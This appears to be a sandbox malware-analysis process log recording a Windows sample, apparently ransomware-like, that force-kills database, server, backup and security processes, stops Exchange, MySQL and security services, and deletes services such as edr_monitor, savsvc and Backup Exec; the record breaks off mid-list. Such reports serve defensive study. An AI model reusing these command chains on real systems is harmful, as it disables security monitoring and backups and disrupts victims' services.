C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F4⤵PID:744
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F4⤵PID:624
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F4⤵PID:4656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F4⤵
- Kills process with taskkill
PID:1312 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F4⤵PID:4308
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F4⤵PID:3076
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F4⤵PID:3488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F4⤵PID:5116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F4⤵
- Kills process with taskkill
PID:1800 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F4⤵PID:1456
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F4⤵PID:4292
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F4⤵PID:4928
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F4⤵PID:3352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F4⤵PID:4656
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F4⤵PID:4952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F4⤵
- Kills process with taskkill
PID:212 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F4⤵
- Kills process with taskkill
PID:1308 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F4⤵
- Kills process with taskkill
PID:5000 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Tencentdll.exe /F4⤵PID:1340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F4⤵PID:824
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"3⤵PID:2236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F4⤵PID:1324
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F4⤵PID:1316
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F4⤵PID:1512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F4⤵
- Kills process with taskkill
PID:4300 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F4⤵PID:412
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F4⤵PID:3828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F4⤵PID:1856
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F4⤵
- Kills process with taskkill
PID:220 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F4⤵PID:4352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F4⤵PID:3404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F4⤵PID:1552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F4⤵PID:4428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F4⤵
- Kills process with taskkill
PID:3048 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F4⤵
- Kills process with taskkill
PID:1548 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F4⤵PID:2604
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F4⤵PID:4308
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F4⤵PID:4184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F4⤵PID:756
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F4⤵PID:1100
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F4⤵PID:4468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F4⤵PID:3764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F4⤵PID:4004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IDDAService.exe /F4⤵PID:3500
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""3⤵PID:3704
-
C:\Windows\SysWOW64\net.exenet stop UIODetect4⤵PID:4880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect5⤵PID:1004
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd4⤵PID:3768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd5⤵PID:2596
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer84⤵
- Discovers systems in the same network
PID:4748 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer85⤵PID:412
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService4⤵PID:1308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService5⤵PID:4924
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService4⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService5⤵PID:1316
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor4⤵PID:4292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor5⤵PID:3076
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer4⤵PID:4500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer5⤵PID:212
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport4⤵PID:4780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport5⤵PID:3528
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP5⤵PID:4800
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"4⤵PID:212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"5⤵PID:3636
-
C:\Windows\SysWOW64\net.exenet stop Tomcat84⤵PID:4264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat85⤵PID:1864
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer4⤵
- Discovers systems in the same network
PID:1652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer5⤵PID:4144
-
C:\Windows\SysWOW64\net.exenet stop QPCore4⤵PID:732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore5⤵PID:4308
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer4⤵PID:804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer5⤵PID:1404
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer4⤵PID:3128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer5⤵PID:512
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService4⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService5⤵PID:3756
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"4⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"5⤵PID:3660
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"4⤵PID:4364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"5⤵PID:3120
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"4⤵PID:1296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"5⤵PID:1216
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService4⤵PID:5068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService5⤵PID:1148
-
C:\Windows\SysWOW64\net.exenet stop AGSService4⤵PID:820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService5⤵PID:4200
-
C:\Windows\SysWOW64\net.exenet stop RapService4⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService5⤵PID:448
-
C:\Windows\SysWOW64\net.exenet stop DDNSService4⤵PID:3172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDNSService5⤵PID:1084
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"3⤵PID:5056
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService14⤵PID:2676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService15⤵PID:5076
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService24⤵PID:4804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService25⤵PID:2164
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"4⤵PID:3404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"5⤵PID:2104
-
C:\Windows\SysWOW64\net.exenet stop Apache2.44⤵PID:1004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.45⤵PID:4764
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService4⤵PID:1796
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit4⤵PID:2036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit5⤵PID:1776
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology4⤵PID:3120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology5⤵PID:3380
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate4⤵PID:4320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate5⤵PID:4872
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance4⤵PID:820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance5⤵PID:4568
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt4⤵PID:2604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt5⤵PID:2344
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery4⤵PID:2140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery5⤵PID:4028
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics4⤵PID:4932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics5⤵PID:1380
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync4⤵PID:288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync5⤵PID:3756
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch4⤵PID:396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch5⤵PID:4092
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport4⤵PID:3108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport5⤵PID:3476
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM4⤵PID:5068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHM5⤵PID:288
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20084⤵PID:3068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20085⤵PID:4716
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery4⤵PID:3648
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery5⤵PID:1440
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap44⤵PID:4028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap45⤵PID:4884
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE4⤵PID:3696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE5⤵PID:2596
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS4⤵PID:4416
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants4⤵PID:3580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants5⤵PID:4244
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication4⤵PID:4760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication5⤵PID:3848
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""3⤵PID:1956
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService4⤵PID:4536
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA4⤵
- Launches sc.exe
PID:4308 -
C:\Windows\SysWOW64\sc.exesc delete RTCATS4⤵
- Launches sc.exe
PID:3172 -
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU4⤵PID:4400
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms4⤵
- Launches sc.exe
PID:3660 -
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU4⤵
- Launches sc.exe
PID:4084 -
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU4⤵PID:3468
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU4⤵PID:2124
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR4⤵PID:2164
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService164⤵PID:3660
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService164⤵PID:1940
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV44⤵
- Launches sc.exe
PID:3632 -
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController4⤵PID:3172
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV44⤵PID:2952
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV44⤵
- Launches sc.exe
PID:4388 -
C:\Windows\SysWOW64\sc.exesc delete OSearch164⤵
- Launches sc.exe
PID:4536 -
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService164⤵PID:4828
-
C:\Windows\SysWOW64\sc.exesc delete c2wts4⤵
- Launches sc.exe
PID:2164 -
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService4⤵
- Launches sc.exe
PID:4184 -
C:\Windows\SysWOW64\sc.exesc delete ADWS4⤵PID:1404
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard574⤵
- Launches sc.exe
PID:1928 -
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService574⤵PID:1200
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc4⤵PID:3920
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer4⤵PID:2960
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"4⤵
- Launches sc.exe
PID:4092 -
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc4⤵PID:1964
-
C:\Windows\SysWOW64\sc.exesc delete LPManager4⤵PID:3476
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter4⤵PID:1632
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28704⤵PID:5100
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup104⤵PID:3068
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem54⤵PID:4716
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer4⤵
- Launches sc.exe
PID:4488 -
C:\Windows\SysWOW64\sc.exesc delete SQLService4⤵PID:2984
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv4⤵PID:2888
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem4⤵PID:2960
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc4⤵PID:1084
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService4⤵PID:4800
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService4⤵PID:3840
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService4⤵PID:3380
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService4⤵PID:1484
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService4⤵PID:2280
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService4⤵PID:1312
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate4⤵PID:1136
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor4⤵PID:3048
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer4⤵PID:636
-
C:\Windows\SysWOW64\sc.exesc delete savsvc4⤵
- Launches sc.exe
PID:2476 -
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService4⤵PID:3476
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService4⤵PID:1004
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService4⤵PID:3452
-
C:\Windows\SysWOW64\sc.exesc delete "U8WorkerService2"4⤵PID:1428
-
C:\Windows\SysWOW64\sc.exesc delete CIS4⤵PID:1100
-
C:\Windows\SysWOW64\sc.exesc delete EASService4⤵PID:4744
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"3⤵PID:2316
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"4⤵PID:4388
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv34⤵PID:2344
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses34⤵
- Launches sc.exe
PID:2960 -
C:\Windows\SysWOW64\sc.exesc delete FxService4⤵
- Launches sc.exe
PID:4780 -
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"4⤵PID:3992
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks4⤵PID:3692
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv4⤵PID:624
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"4⤵PID:1856
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"4⤵
- Launches sc.exe
PID:4656 -
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"4⤵PID:396
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv4⤵PID:4716
-
